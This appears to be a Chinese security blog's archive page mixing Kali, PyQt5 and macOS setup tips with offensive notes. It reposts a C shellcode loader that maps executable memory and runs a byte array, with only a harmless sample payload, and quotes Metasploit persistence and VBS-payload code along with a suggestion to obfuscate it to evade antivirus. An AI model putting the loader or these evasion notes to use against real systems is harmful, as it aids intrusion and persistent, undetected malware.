原文:https://khr0x40sh.wordpress.com/2012/05/22/msf-startup-at-boot-using-msfrpcd-msgpack-msf-rc-files-for-disaster-recovery/
继续阅读转载: MSF Startup at boot? Using msfrpcd, msgpack, & msf rc files for “disaster recovery”
分类: 未分类
Kali+VNC除了LXDE另一种方案
转自:https://forums.kali.org/showthread.php?26823-Remote-access-with-SSH-TightVNC-failed-with-new-Kali-2-0
I have, but it involves installing the MATE desktop environment, which is a GNOME 2 fork.
First, you have to install MATE:
$ sudo apt-get install mate-core mate-desktop-environment-extra mate-desktop-environment-extras mate-themes
Then, you have to change a line in the ~/.vnc/xstartup, replacing
/etc/X11/Xsession
with
/usr/bin/mate-session
It is just a workaround, as MATE offers a different look and feel than GNOME.
The underlying problems with GNOME and VNC (and RDP, NX, …) are described here:
https://bugs.debian.org/cgi-bin/bugr…cgi?bug=776746
https://bugs.launchpad.net/ubuntu/+s…n/+bug/1251281
and it looks like a fix for Debian will take some time…
流量走tor
转几个ShellcodeLoader
refer:https://github.com/VeroFess/shellcode_loader/blob/master/loader.c
#include <stdio.h> #ifdef _MSC_VER #define forceinline __forceinline #elif defined __GNUC__ #define forceinline __inline__ __attribute__((always_inline)) #else #define forceinline #endif #ifdef linux #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <string.h> #ifdef __x86_64__ #define __VM_X64 #elif __i386__ #define __VM_X32 #endif forceinline void * __runable_malloc(int size) { int fd = open("/dev/zero", O_RDONLY); void * ret = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE, fd, 0); close(fd); return ret; } #else #include <Windows.h> #ifdef _WIN64 #define __VM_X64 #else #define __VM_X32 #endif forceinline void * __runable_malloc(int size) { return VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); } #endif forceinline void * __makefuncttion(unsigned char * shellcode, int len) { void * address_shellcode = __runable_malloc(len + 1); memcpy((char *)address_shellcode, shellcode, len); *((char *)address_shellcode + len) = 0xc3; return address_shellcode; } int main() { typedef unsigned long(*func)(); #ifdef __VM_X64 unsigned char shellcode[] = { 0x48,0xC7,0xC0,0x01,0x00,0x00,0x00 }; #else unsigned char shellcode[] = { 0xb8,0x01,0x00,0x00,0x00 }; #endif func fun = (func)__makefuncttion(shellcode, sizeof(shellcode)); int ret = fun(); printf("ret is : %d\n", ret); getchar(); return 0; }
msf persist免杀
persist调用
/usr/local/share/metasploit-framework/modules/exploits/windows/local/persistence.rb
exe = generate_payload_exe # Generate the vbs payload vprint_status("Generating VBS persistent script (#{rvbs_name})") vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
::Msf::Util::EXE.to_exe_vbs 来自 /usr/local/share/metasploit-framework/lib/msf/util/exe.rb
# self.to_exe_vba # # @param exes [String] # @param opts [Hash] # @option opts [String] :delay # @option opts [String] :persists # @option opts [String] :exe_filename def self.to_exe_vbs(exes = '', opts = {}) delay = opts[:delay] || 5 persist = opts[:persist] || false hash_sub = {} hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe' hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64' hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes) hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:init] = "" if persist hash_sub[:init] << "Do\r\n" hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n" hash_sub[:init] << "Loop\r\n" else hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" end read_replace_script_template("to_exe.vbs.template", hash_sub) end
to_exe.vbs.template 来自 /usr/local/share/metasploit-framework/data/templates/scripts/to_exe.vbs.template
然后,各种变形混淆吧
msf tips: session is not valid and will be closed
本地可绑定IP与外网IP不一致时
LHOST LPORT用来帮助信标找到服务器
ReverseListenerBindHost 是绑定地址
另外需要关闭AutoVerifySession(原因未知)
问题:
https://github.com/rapid7/metasploit-framework/issues/6799
参见:
https://github.com/rapid7/metasploit-framework/wiki/Debugging-Dead-Meterpreter-Sessions
继续阅读msf tips: session is not valid and will be closed
pyq5开发环境部署
1.eric IDE开发环境
http://eric-ide.python-projects.org/eric-download.html
Installation using PyQt5 wheels
Installing eric6 and its pre-requisites is easy using the PyQt5 Python wheels. In order to have access to the suite of Qt tools and documentation it is recommended to install the Qt development environment because these tools are not part of the PyQt5 wheels.
Download the Qt online installer from the Qt download site.
Install Qt by executing the installer.
Install the eric6 pre-requisites (PyQt, sip and QScintilla) by entering this command in a shell / command window:
pip install qscintilla
or
pip3 install qscintilla
This will install QScintilla and all dependencies, which are PyQt5 and sip.
Install eric6 and configure the path to the Qt tools on the Qt page of the configuration dialog.
Once the eric6 IDE is started the Qt documentation may be loaded into the eric web browser via the Settings ➡ Mange Qt Help Documents menu entry. Note that the documentation (Python/Qt/PyQt) is available in QtHelp format as of November 2016 as documentation plug-ins. In order to use this feature, eric 16.11 or newer needs to be installed.
继续阅读pyq5开发环境部署
rbenv tips
some tips about rb
继续阅读rbenv tips
安全漏洞的概念及分类
复习一下姿势,转自 http://sec.chinabyte.com/165/12946665.shtml
继续阅读安全漏洞的概念及分类
MacOS安装Metasploit报错tips
ruby的pg库报错:
ARCHFLAGS=”-arch x86_64″ bundle install
rb版本
rbenv解决,msf建议的rb版本去github看
Nokogiri 报错
http://stackoverflow.com/questions/24091869/installing-nokogiri-on-osx-10-10-yosemite
先安装
brew tap homebrew/dupes
brew install libxml2 libxslt
brew install libiconv
然后
gem install nokogiri -v ‘1.6.8.1’ — –with-iconv-dir=/usr/local/Cellar/libiconv/1.14/ –use-system-libraries=true –with-xml2-include=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/libxml2/
postgresql启动不了、连不上
原因是9.5升9.6数据库文件不兼容
brew uninstall postgresql
删除/usr/local/var/postgres/
重新安装